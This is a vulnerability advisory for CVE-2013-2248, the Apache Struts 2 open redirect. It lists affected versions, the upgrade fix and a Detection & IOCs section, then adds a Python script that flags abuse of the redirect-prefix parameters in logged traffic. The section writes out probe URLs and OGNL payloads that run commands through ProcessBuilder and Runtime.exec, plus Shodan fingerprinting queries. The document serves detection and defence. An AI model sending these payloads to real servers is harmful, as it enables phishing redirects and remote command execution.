CVE-2013-2248
published 2013-07-20


Priority: P3 · 44
Severity: medium (CVSS 2.0 base score 5.8)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:N (network access, medium complexity, no authentication, partial confidentiality and integrity impact, no availability impact)
Exploit: public exploit available
EPSS: 94.65% (99.8th percentile)
Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.

Affected

44 ranges · showing 25
Vendor: apache · Product: struts
All 25 rows shown list vendor apache, product struts; the per-row version-range and fixed-in cells did not survive extraction. The description above gives the affected span as 2.0.0 through 2.3.15, and the upgrade note under Detection & IOCs gives 2.3.15.1 as the first fixed release.

Detection & IOCs (extracted from sources)

Request URLs (open-redirect and OGNL probes; {{BaseURL}} is a Nuclei template placeholder, and %25 is the URL-encoded percent sign, so the server sees %{...}):
  {{BaseURL}}/index.action?redirect:http://www.interact.sh/
  http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
  http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
  /bar.action?redirect:http://www.google.com/%25{1000-1}
  http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
  http://host/struts2-blank/example/X.action?action:%25{3*4}
  http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
  http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
  http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
OGNL command payloads (placed after a redirect: / redirectAction: / action: prefix):
  %{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}
  %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}
Response matcher (labelled "yara" on the source page, but it is a plain regex over the Location header; it fires when the redirect lands on interact.sh):
  (?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$
  • Detect exploitation attempts by inspecting HTTP request parameters for names that begin with the redirect: or redirectAction: prefix, in both the query string and the request body, against any .action endpoint. DefaultActionMapper reads the prefix from the parameter name, so ?redirect:http://evil/ arrives as a parameter named redirect:http://evil/ with an empty value.
  • Both %{expr} and ${expr} OGNL notation can appear in a redirect: / redirectAction: value; filter for both. The percent sign is usually sent encoded (%25{), so URL-decode before matching, and decode a second time to catch double encoding (%2525{).
  • A successful open redirect produces an HTTP 302 whose Location header points at the attacker-controlled URL; monitor .action endpoints for 302 responses whose Location host is not the application's own. A relative or same-host Location is not evidence on its own, but a prefixed parameter in the request still is.
  • All Struts 2 applications using DefaultActionMapper (the default mapper) are affected; fingerprint exposed instances via Shodan/FOFA queries for 'apache struts', 'struts2 showcase' or 'struts problem report' in HTTP responses.
  • ProcessBuilder or Runtime.exec OGNL payloads (new java.lang.ProcessBuilder, @java.lang.Runtime@getRuntime().exec, #_memberAccess) in redirect:, redirectAction: or action: parameters indicate an RCE attempt rather than a plain open redirect; alert on these strings in HTTP parameters. The OGNL-evaluation side of these prefixes is tracked separately as CVE-2013-2251 (S2-016), fixed in the same 2.3.15.1 release; this CVE (S2-017) is the open redirect, which needs no OGNL at all.
  • The action: prefix is only usable for attacks when wildcard action mapping is enabled in the Struts 2 configuration; redirect: and redirectAction: depend on no configuration and are exploitable on every affected version.
  • From 2.3.15.1 on, redirect: and redirectAction: parameters are dropped by DefaultActionMapper and no longer function; applications that relied on them will break on upgrade and need to move to the redirect / redirectAction result types configured in struts.xml instead.
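The request-side and response-side checks from the bullets above, as an added Python example that is not part of the source page or of the Apache Struts project. It assumes a simple record format (request path, optional form body, response status, Location header) and an application host of www.example.com; the sample traffic is constructed here from the URL patterns listed above, not captured from a real system. Parameter names rather than values are matched because DefaultActionMapper reads the prefix from the parameter name.

```python
"""Flag CVE-2013-2248 style prefix abuse in Struts 2 traffic (request and response side)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# DefaultActionMapper reads these prefixes from the parameter *name*, so a request
# like ?redirect:http://evil/ arrives as name "redirect:http://evil/" with an empty value.
PREFIXES = ("redirect:", "redirectAction:", "action:")
OGNL_RE = re.compile(r"[%$]\{")  # both %{expr} and ${expr} notations
RCE_RE = re.compile(
    r"java\.lang\.ProcessBuilder|java\.lang\.Runtime|_memberAccess|allowStaticMethodAccess"
)
SEVERITY = {"open_redirect": 1, "ognl": 2, "rce": 3}


def request_params(path, body=""):
    """(name, value) pairs from the query string and the form body, URL-decoded once."""
    pairs = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    if body:
        pairs += parse_qsl(body, keep_blank_values=True)
    return pairs


def classify_request(path, body=""):
    """Most severe finding for one request: 'rce', 'ognl', 'open_redirect' or None."""
    worst = None
    for name, value in request_params(path, body):
        prefix = next((p for p in PREFIXES if name.startswith(p)), None)
        if prefix is None:
            continue
        # Re-join name and value: an '=' inside an OGNL payload splits it in two.
        payload = name[len(prefix):] + ("=" + value if value else "")
        # parse_qsl decoded once (%25{ -> %{); decode again to catch %2525{ double encoding.
        payload = unquote(payload)
        if RCE_RE.search(payload):
            kind = "rce"
        elif OGNL_RE.search(payload):
            kind = "ognl"
        else:
            kind = "open_redirect"
        if worst is None or SEVERITY[kind] > SEVERITY[worst]:
            worst = kind
    return worst


def offsite_redirect(status, location, own_host):
    """True when a 302 sends the client to a host other than the application's own."""
    if status != 302 or not location:
        return False
    target = urlsplit(location.strip()).hostname  # also catches //evil.example/ forms
    if target is None:  # relative Location stays on the application
        return False
    return target.lower() != own_host.lower()


def scan(records, own_host):
    """Run both checks over access-log style records; return (index, kind, offsite) triples."""
    alerts = []
    for i, rec in enumerate(records):
        kind = classify_request(rec["path"], rec.get("body", ""))
        offsite = offsite_redirect(rec["status"], rec.get("location"), own_host)
        if kind or offsite:
            alerts.append((i, kind, offsite))
    return alerts


# Constructed sample traffic for the application host www.example.com (not real captures).
SAMPLE = [
    {"path": "/index.action?redirect:http://www.interact.sh/",
     "status": 302, "location": "http://www.interact.sh/"},
    {"path": "/struts2-showcase/employee/save.action", "body": "redirect:%25{3*4}",
     "status": 302, "location": "/12"},
    {"path": "/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder("
             "new+java.lang.String[]{'id'})).start()}",
     "status": 200, "location": None},
    {"path": "/login.action?redirect=/home", "status": 302, "location": "/home"},  # benign
    {"path": "/index.action?redirectAction:http://www.example.com/%23",
     "status": 302, "location": "http://www.example.com/"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE, "www.example.com"):
        print(alert)
```

The benign record shows why the colon matters: a parameter named redirect (no colon) is an ordinary form field, and only names that start with one of the prefixes are treated specially by Struts. The last record is flagged from the request side even though its Location stays on the application's own host.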